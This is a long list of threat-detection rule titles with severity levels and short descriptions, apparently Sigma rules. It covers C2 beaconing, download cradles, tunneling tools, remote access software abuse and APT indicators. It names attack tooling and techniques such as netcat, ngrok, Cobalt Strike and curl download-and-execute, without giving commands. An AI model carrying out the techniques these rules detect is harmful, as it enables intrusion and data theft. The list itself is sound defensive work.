Wannacry Killswitch DomainhighDetects wannacry killswitch domain dns queries
Default Cobalt Strike CertificatehighDetects the presence of default Cobalt Strike certificate in the HTTPS traffic
New Kind of Network (NKN) DetectionlowNKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>
Suspicious DNS Z Flag Bit SetmediumThe DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused). Although recently it has been used in DNSSec, the value being set to anything other than 0 should be rare. Otherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward. Determine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering. This Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'
Executable from WebdavmediumDetects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/
Download from Suspicious Dyndns HostsmediumDetects download of certain file types from hosts with dynamic DNS names (selected list)
Windows WebDAV User AgenthighDetects WebDav DownloadCradle
HackTool - CobaltStrike Malleable Profile Patterns - ProxyhighDetects cobalt strike malleable profiles patterns (URI, User-Agents, Methods).
HackTool - BabyShark Agent Default URL PatterncriticalDetects Baby Shark C2 Framework default communication patterns
HackTool - Empire UserAgent URI CombohighDetects user agent and URI paths used by empire agents
PwnDrp AccesscriticalDetects downloads from PwnDrp web servers developed for red team testing and most likely also used for criminal activity
Raw Paste Service AccesshighDetects direct access to raw pastes in different paste services often used by malware in their second stages to download malicious code in encrypted or encoded form
Telegram API AccessmediumDetects suspicious requests to Telegram API without the usual Telegram User-Agent
APT User AgenthighDetects suspicious user agent strings used in APT malware in proxy logs
Suspicious Base64 Encoded User-AgentmediumDetects suspicious encoded User-Agent strings, as seen used by some malware.
Bitsadmin to Uncommon IP Server AddresshighDetects Bitsadmin connections to IP addresses instead of FQDN names
Bitsadmin to Uncommon TLDhighDetects Bitsadmin connections to domains with uncommon TLDs
Crypto Miner User AgenthighDetects suspicious user agent strings used by crypto miners in proxy logs
HTTP Request With Empty User AgentmediumDetects a potentially suspicious empty user agent strings in proxy log. Could potentially indicate an uncommon request method.
Exploit Framework User AgenthighDetects suspicious user agent strings used by exploit / pentest frameworks like Metasploit in proxy logs
Malware User AgenthighDetects suspicious user agent strings used by malware in proxy logs
Windows PowerShell User AgentmediumDetects Windows PowerShell Web Access
Suspicious User AgenthighDetects suspicious malformed user agent strings in proxy logs
Potential Base64 Encoded User-AgentmediumDetects User Agent strings that end with an equal sign, which can be a sign of base64 encoding.
DNS Query To Put.io - DNS ClientmediumDetects DNS queries for subdomains related to "Put.io" sharing website.
Query Tor Onion Address - DNS ClienthighDetects DNS resolution of an .onion address related to Tor routing networks
Suspicious Cobalt Strike DNS Beaconing - DNS ClientcriticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
Potential Remote Desktop Connection to Non-Domain HostmediumDetects logons using NTLM to hosts that are potentially not part of the domain.
RDP over Reverse SSH Tunnel WFPhighDetects svchost hosting RDP termsvcs communicating with the loopback address
Suspicious LDAP-Attributes UsedhighDetects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
Password Protected ZIP File Opened (Suspicious Filenames)highDetects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.
Mesh Agent Service InstallationmediumDetects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers
TacticalRMM Service InstallationmediumDetects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.
Ngrok Usage with Remote Desktop ServicehighDetects cases in which ngrok, a reverse proxy tool, forwards events to the local RDP port, which could be a sign of malicious behaviour
AppX Package Installation Attempts Via AppInstaller.EXEmediumDetects DNS queries made by "AppInstaller.EXE". The AppInstaller is the default handler for the "ms-appinstaller" URI. It attempts to load/install a package from the referenced URL
Cloudflared Tunnels Related DNS RequestsmediumDetects DNS requests to Cloudflared tunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
DNS Query To Devtunnels DomainmediumDetects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
DNS Query To AzureWebsites.NET By Non-Browser ProcessmediumDetects a DNS query by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Suspicious Cobalt Strike DNS Beaconing - SysmoncriticalDetects a program that invoked suspicious DNS queries known from Cobalt Strike beacons
DNS Query To Remote Access Software Domain From Non-Browser AppmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
TeamViewer Domain Query By Non-TeamViewer ApplicationmediumDetects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)
DNS Query Tor .Onion Address - SysmonhighDetects DNS queries to an ".onion" address related to Tor routing networks
DNS Query To Visual Studio Code Tunnels DomainmediumDetects DNS query requests to Visual Studio Code tunnel domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
ADSI-Cache File Creation By Uncommon ToolmediumDetects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
Suspicious Binary Writes Via AnyDeskhighDetects AnyDesk writing binary files to disk other than "gcapi.dll". According to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll, which is a legitimate DLL that is part of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)
Anydesk Temporary ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
GoToAssist Temporary Installation ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
HackTool - Inveigh Execution ArtefactscriticalDetects the presence and execution of Inveigh via dropped artefacts
HackTool - RemoteKrbRelay SMB Relay Secrets Dump Module IndicatorshighDetects the creation of file with specific names used by RemoteKrbRelay SMB Relay attack module.
Installation of TeamViewer DesktopmediumTeamViewer_Desktop.exe is create during install
New Outlook Macro CreatedmediumDetects the creation of a macro file for Outlook.
Suspicious Outlook Macro CreatedhighDetects the creation of a macro file for Outlook.
ScreenConnect Temporary Installation ArtefactmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Suspicious Desktopimgdownldr Target FilehighDetects a suspicious Microsoft desktopimgdownldr file creation that stores a file to a suspicious location or contains a file with a suspicious extension
TeamViewer Remote SessionmediumDetects the creation of log files during a TeamViewer remote session
Hijack Legit RDP Session to Move LaterallyhighDetects the usage of tsclient share to place a backdoor on the RDP source machine's startup folder
Visual Studio Code Tunnel Remote File CreationmediumDetects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature
Renamed VsCode Code Tunnel Execution - File IndicatorhighDetects the creation of a file with the name "code_tunnel.json" which indicate execution and usage of VsCode tunneling utility by an "Image" or "Process" other than VsCode.
HackTool - SILENTTRINITY Stager DLL LoadhighDetects SILENTTRINITY stager dll loading activity
Uncommon Network Connection Initiated By Certutil.EXEhighDetects a network connection initiated by the certutil.exe utility. Attackers can abuse the utility in order to download malware or additional payloads.
Network Connection Initiated To AzureWebsites.NET By Non-Browser ProcessmediumDetects an initiated network connection by a non browser process on the system to "azurewebsites.net". The latter was often used by threat actors as a malware hosting and exfiltration site.
Network Connection Initiated To Cloudflared Tunnels DomainsmediumDetects network connections to Cloudflared tunnels domains initiated by a process on the system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
New Connection Initiated To Potential Dead Drop Resolver DomainhighDetects an executable, which is not an internet browser or known application, initiating network connections to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks. In this context attackers leverage known websites such as "facebook", "youtube", etc. In order to pass through undetected.
Suspicious Dropbox API UsagehighDetects an executable that isn't dropbox but communicates with the Dropbox API
Suspicious Non-Browser Network Communication With Google APImediumDetects a non-browser process interacting with the Google API which could indicate the use of a covert C2 such as Google Sheet C2 (GC2-sheet)
Communication To LocaltoNet Tunneling Service InitiatedhighDetects an executable initiating a network connection to "LocaltoNet" tunneling sub-domains. LocaltoNet is a reverse proxy that enables localhost services to be exposed to the Internet. Attackers have been seen to use this service for command-and-control activities to bypass MFA and perimeter controls.
Communication To Ngrok Tunneling Service InitiatedhighDetects an executable initiating a network connection to "ngrok" tunneling domains. Attackers were seen using this "ngrok" in order to store their second stage payloads and malware. While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
Potentially Suspicious Network Connection To Notion APIlowDetects a non-browser process communicating with the Notion API. This could indicate potential use of a covert C2 channel such as "OffensiveNotion C2"
Network Communication Initiated To Portmap.IO DomainmediumDetects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
Suspicious Non-Browser Network Communication With Telegram APImediumDetects an a non-browser process interacting with the Telegram API which could indicate use of a covert C2
Network Connection Initiated By IMEWDBLD.EXEhighDetects a network connection initiated by IMEWDBLD.EXE. This might indicate potential abuse of the utility as a LOLBIN in order to download arbitrary files or additional payloads.
Network Connection Initiated Via Notepad.EXEhighDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
Office Application Initiated Network Connection Over Uncommon PortsmediumDetects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
RDP Over Reverse SSH TunnelhighDetects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389
RDP to HTTP or HTTPS Target PortshighDetects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443
Remote Access Tool - AnyDesk Incoming ConnectionmediumDetects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel.
Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon LocationhighDetects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.
Potentially Suspicious Malware Callback CommunicationhighDetects programs that connect to known malware callback ports based on statistical analysis from two different sandbox system databases
Network Communication Initiated To File Sharing Domains From Process Located In Suspicious FolderhighDetects executables located in potentially suspicious directories initiating network connections towards file sharing domains.
Communication To Uncommon Destination PortsmediumDetects programs that connect to uncommon destination ports
Outbound Network Connection To Public IP Via WinlogonmediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
Suspicious Wordpad Outbound ConnectionsmediumDetects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.
Outbound Network Connection Initiated By Script InterpreterhighDetects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.
Local Network Connection Initiated By Script InterpretermediumDetects a script interpreter (Wscript/Cscript) initiating a local network connection to download or execute a script hosted on a shared folder.
Netcat The Powershell VersionmediumAdversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
Silence.EDA DetectioncriticalDetects Silence EmpireDNSAgent as described in the Group-IP report
Potential COM Objects Download Cradles Usage - PS ScriptmediumDetects usage of COM objects that can be abused to download files in PowerShell by CLSID
Suspicious FromBase64String Usage On Gzip Archive - Ps ScriptmediumDetects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
Change User Agents with WebRequestmediumAdversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Suspicious TCP Tunnel Via PowerShell ScriptmediumDetects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
Suspicious SSL ConnectionlowAdversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol.
Testing Usage of Uncommonly Used PortmediumAdversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443.
Browser Execution In Headless ModemediumDetects execution of Chromium based browser in headless mode
File Download with Headless BrowserhighDetects execution of chromium based browser in headless mode using the "dump-dom" command line to download files
File Download From Browser Process Via Inline URLmediumDetects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.
Tor Client/Browser ExecutionhighDetects the use of Tor or Tor-Browser to connect to onion routing networks
File Download via CertOC.EXEmediumDetects when a user downloads a file by using CertOC.exe
File Download From IP Based URL Via CertOC.EXEhighDetects when a user downloads a file from an IP based URL using CertOC.exe
Cloudflared Portable ExecutionmediumDetects the execution of the "cloudflared" binary from a non standard location.
Cloudflared Quick Tunnel ExecutionmediumDetects creation of an ad-hoc Cloudflare Quick Tunnel, which can be used to tunnel local services such as HTTP, RDP, SSH and SMB. The free TryCloudflare Quick Tunnel will generate a random subdomain on trycloudflare[.]com, following a call to api[.]trycloudflare[.]com. The tool has been observed in use by threat groups including Akira ransomware.
Cloudflared Tunnel Connections CleanupmediumDetects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections.
Cloudflared Tunnel ExecutionmediumDetects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.
Curl Download And Execute CombinationhighAdversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
Command Line Execution with Suspicious URL and AppData StringsmediumDetects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
Potential Download/Upload Activity Using Type CommandmediumDetects usage of the "type" command to download/upload data from WebDAV server
Suspicious Curl.EXE DownloadhighDetects a suspicious curl process start on Windows and outputs the requested document to a local file
Remote File Download Via Desktopimgdownldr UtilitymediumDetects the desktopimgdownldr utility being used to download a remote file. An adversary may use desktopimgdownldr to download arbitrary files as an alternative to certutil.
Suspicious Desktopimgdownldr CommandhighDetects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet
DNS Exfiltration and Tunneling Tools ExecutionhighWell-known DNS Exfiltration tools execution
Finger.EXE ExecutionhighDetects execution of the "finger.exe" utility. Finger.EXE or "TCPIP Finger Command" is an old utility that is still present on modern Windows installation. It Displays information about users on a specified remote computer (typically a UNIX computer) that is running the finger service or daemon. Due to the old nature of this utility and the rareness of machines having the finger service. Any execution of "finger.exe" can be considered "suspicious" and worth investigating.
Arbitrary File Download Via GfxDownloadWrapper.EXEmediumDetects execution of GfxDownloadWrapper.exe with a URL as an argument to download file.
File Download Using Notepad++ GUP UtilityhighDetects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.
HackTool - Htran/NATBypass ExecutionhighDetects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)
HackTool - SharpChisel ExecutionhighDetects usage of the Sharp Chisel via the commandline arguments
HackTool - SILENTTRINITY Stager ExecutionhighDetects SILENTTRINITY stager use via PE metadata
File Download And Execution Via IEExec.EXEhighDetects execution of the IEExec utility to download and execute files
Suspicious Child Process Of Manage Engine ServiceDeskhighDetects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service
Import LDAP Data Interchange Format File Via Ldifde.EXEmediumDetects the execution of "Ldifde.exe" with the import flag "-i". The can be abused to include HTTP-based arguments which will allow the arbitrary download of files from a remote server.
Suspicious Diantz Download and Compress Into a CAB FilemediumDownload and compress a remote file and store it in a cab file on local machine.
Suspicious Extrac32 ExecutionmediumDownload or Copy file with Extrac32
PrintBrm ZIP Creation of ExtractionhighDetects the execution of the LOLBIN PrintBrm.exe, which can be used to create or extract ZIP files. PrintBrm.exe should not be run on a normal workstation.
Replace.exe UsagemediumDetects the use of Replace.exe which can be used to replace file with another file
Suspicious Certreq Command to DownloadhighDetects a suspicious certreq execution taken from the LOLBAS examples, which can be abused to download (small) files
File Download Via Windows Defender MpCmpRun.EXEhighDetects the use of Windows Defender MpCmdRun.EXE to download files
MsiExec Web InstallmediumDetects suspicious msiexec process starts with web addresses as parameter
Mstsc.EXE Execution With Local RDP FilelowDetects potential RDP connection via Mstsc using a local ".rdp" file
Suspicious Mstsc.EXE Execution With Local RDP FilehighDetects potential RDP connection via Mstsc using a local ".rdp" file located in suspicious locations.
New Port Forwarding Rule Added Via Netsh.EXEmediumDetects the execution of netsh commands that configure a new port forwarding (PortProxy) rule
RDP Port Forwarding Rule Added Via Netsh.EXEhighDetects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule
Suspicious Plink Port ForwardinghighDetects suspicious Plink tunnel port forwarding to a local port
Potential RDP Tunneling Via PlinkhighExecution of plink to perform data exfiltration and tunneling
Gzip Archive Decode Via PowerShellmediumDetects attempts of decoding encoded Gzip archives via PowerShell.
Potential COM Objects Download Cradles Usage - Process CreationmediumDetects usage of COM objects that can be abused to download files in PowerShell by CLSID
PowerShell Web DownloadmediumDetects suspicious ways to download files or content using PowerShell
Potential DLL File Download Via PowerShell Invoke-WebRequestmediumDetects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet
Suspicious FromBase64String Usage On Gzip Archive - Process CreationmediumDetects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
Suspicious Invoke-WebRequest Execution With DirectIPmediumDetects calls to PowerShell with Invoke-WebRequest cmdlet using direct IP access
Suspicious Invoke-WebRequest ExecutionhighDetects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location
PowerShell DownloadFilehighDetects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line
PUA - 3Proxy ExecutionhighDetects the use of 3proxy, a tiny free proxy server
PUA - Chisel Tunneling Tool ExecutionhighDetects usage of the Chisel tunneling tool via the commandline arguments
PUA - Fast Reverse Proxy (FRP) ExecutionhighDetects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.
PUA- IOX Tunneling Tool ExecutionhighDetects the use of IOX - a tool for port forwarding and intranet proxy purposes
PUA - Netcat Suspicious ExecutionhighDetects execution of Netcat. Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network
PUA - Ngrok ExecutionhighDetects the use of Ngrok, a utility used for port forwarding and tunneling, often used by threat actors to make local protected services publicly available. Involved domains are bin.equinox.io for download and *.ngrok.io for connections.
PUA - Nimgrab ExecutionhighDetects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.
PUA - NPS Tunneling Tool ExecutionhighDetects the use of NPS, a port forwarding and intranet penetration proxy server
Potentially Suspicious Usage Of QemumediumDetects potentially suspicious execution of the Qemu utility in a Windows environment. Threat actors have leveraged this utility and this technique for achieving network access as reported by Kaspersky.
QuickAssist ExecutionlowDetects the execution of Microsoft Quick Assist tool "QuickAssist.exe". This utility can be used by attackers to gain remote access.
Remote Access Tool - AnyDesk ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - AnyDesk Piped Password Via CLImediumDetects piping the password to an anydesk instance via CMD and the '--set-password' flag.
Remote Access Tool - AnyDesk Silent InstallationhighDetects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.
Remote Access Tool - Anydesk Execution From Suspicious FolderhighAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - MeshAgent Command Execution via MeshCentralmediumDetects the use of MeshAgent to execute commands on the target host, particularly when threat actors might abuse it to execute commands directly. MeshAgent can execute commands on the target host by leveraging win-console to obscure their activities and win-dispatcher to run malicious code through IPC with child processes.
Remote Access Tool - NetSupport ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - GoToAssist ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - LogMeIn ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - ScreenConnect ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - ScreenConnect Potential Suspicious Remote Command ExecutionmediumDetects potentially suspicious child processes launched via the ScreenConnect client service.
Remote Access Tool - Simple Help ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Remote Access Tool - UltraViewer ExecutionmediumAn adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)
Renamed Cloudflared.EXE ExecutionhighDetects the execution of a renamed "cloudflared" binary.
Renamed Remote Utilities RAT (RURAT) ExecutionmediumDetects execution of renamed Remote Utilities (RURAT) via Product PE header field
Port Forwarding Activity Via SSH.EXEmediumDetects port forwarding activity via SSH.exe
Potential RDP Tunneling Via SSHhighExecution of ssh.exe to perform data exfiltration and tunneling through RDP
Potential Amazon SSM Agent HijackingmediumDetects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.
Suspicious Download from Office DomainhighDetects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents
Suspicious TSCON Start as SYSTEMhighDetects a tscon.exe start as LOCAL SYSTEM
Use of UltraVNC Remote Access SoftwaremediumAn adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks
Visual Studio Code Tunnel ExecutionmediumDetects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
Visual Studio Code Tunnel Shell ExecutionmediumDetects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.
Renamed Visual Studio Code Tunnel ExecutionhighDetects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel
Visual Studio Code Tunnel Service InstallationmediumDetects the installation of VsCode tunnel (code-tunnel) as a service.
Pandemic Registry KeycriticalDetects Pandemic Windows Implant
New PortProxy Registry Entry AddedmediumDetects the modification of the PortProxy registry key which is used for port forwarding.
Lolbas OneDriveStandaloneUpdater.exe Proxy DownloadhighDetects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json
Potential Persistence Via Outlook LoadMacroProviderOnBoot SettinghighDetects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module
Outlook Macro Execution Without Warning Setting EnabledhighDetects the modification of Outlook security setting to allow unprompted execution of macros.
Equation Group C2 CommunicationhighDetects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools
OilRig APT ActivitycriticalDetects OilRig activity as reported by Nyotron in their March 2018 report
OilRig APT Registry PersistencecriticalDetects OilRig registry persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SecuritycriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
OilRig APT Schedule Task Persistence - SystemcriticalDetects OilRig schedule task persistence as reported by Nyotron in their March 2018 report
Chafer Malware URL PatternhighDetects HTTP request used by Chafer malware to receive data from its C2.
Ursnif Malware C2 URL PatterncriticalDetects Ursnif C2 traffic.
Ursnif Malware Download URL PatternhighDetects download of Ursnif malware done by dropper documents.
APT40 Dropbox Tool User AgenthighDetects suspicious user agent string of APT40 Dropbox tool
ComRAT Network CommunicationhighDetects Turla ComRAT network communication.
GALLIUM IOCshighDetects artifacts associated with GALLIUM cyber espionage group as reported by Microsoft Threat Intelligence Center in the December 2019 report.
GALLIUM Artefacts - BuiltinhighDetects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.
Greenbug Espionage Group IndicatorscriticalDetects tools and process executions used by Greenbug in their May 2020 campaign as reported by Symantec
Devil Bait Potential C2 Communication TraffichighDetects potential C2 communication related to Devil Bait malware
Goofy Guineapig Backdoor Potential C2 CommunicationhighDetects potential C2 communication related to Goofy Guineapig backdoor
Small Sieve Malware Potential C2 CommunicationcriticalDetects potential C2 communication related to Small Sieve malware
Potential CVE-2023-36884 Exploitation PatterncriticalDetects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884
Potential CVE-2303-36884 URL Request Pattern TraffichighDetects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCOM potentially exploiting CVE-2023-36884
Potential CVE-2023-36884 Exploitation - File DownloadsmediumDetects files seen being requested by RomCom while potentially exploiting CVE-2023-36884
Potential CVE-2023-36884 Exploitation - URL MarkerhighDetects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884
Potential CVE-2023-36884 Exploitation - Share AccesshighDetects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884
Potential SocGholish Second Stage C2 DNS QueryhighDetects a DNS query initiated from a "wscript" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic
DarkGate - Autoit3.EXE File Creation By Uncommon ProcessmediumDetects the usage of curl.exe, KeyScramblerLogon, or other non-standard/suspicious processes used to create Autoit3.exe. This activity has been associated with DarkGate malware, which uses Autoit3.exe to execute shellcode that performs process injection and connects to the DarkGate command-and-control server. Curl, KeyScramblerLogon, and these other processes consitute non-standard and suspicious ways to retrieve the Autoit3 executable.
Potential Pikabot C2 ActivityhighDetects the execution of rundll32 that leads to an external network connection. The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
Potential Compromised 3CXDesktopApp Beaconing Activity - DNShighDetects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
Potential Compromised 3CXDesktopApp Beaconing Activity - NetconhighDetects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
Potential Suspicious Child Process Of 3CXDesktopApphighDetects potential suspicious child processes of "3CXDesktopApp.exe". Which could be related to the 3CXDesktopApp supply chain compromise
Potential Compromised 3CXDesktopApp Beaconing Activity - ProxyhighDetects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise
Potential Compromised 3CXDesktopApp ICO C2 File DownloadhighDetects potential malicious .ICO files download from a compromised 3CXDesktopApp via web requests to the the malicious Github repository
Diamond Sleet APT DNS Communication IndicatorshighDetects DNS queries related to Diamond Sleet APT activity
Potential Operation Triangulation C2 Beaconing Activity - DNShighDetects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
Potential Operation Triangulation C2 Beaconing Activity - ProxyhighDetects potential beaconing activity to domains used in 0day attacks on iOS devices and revealed by Kaspersky and the FSB
Potential Peach Sandstorm APT C2 Communication ActivitymediumDetects potential C2 communication activity related to Peach Sandstorm APT
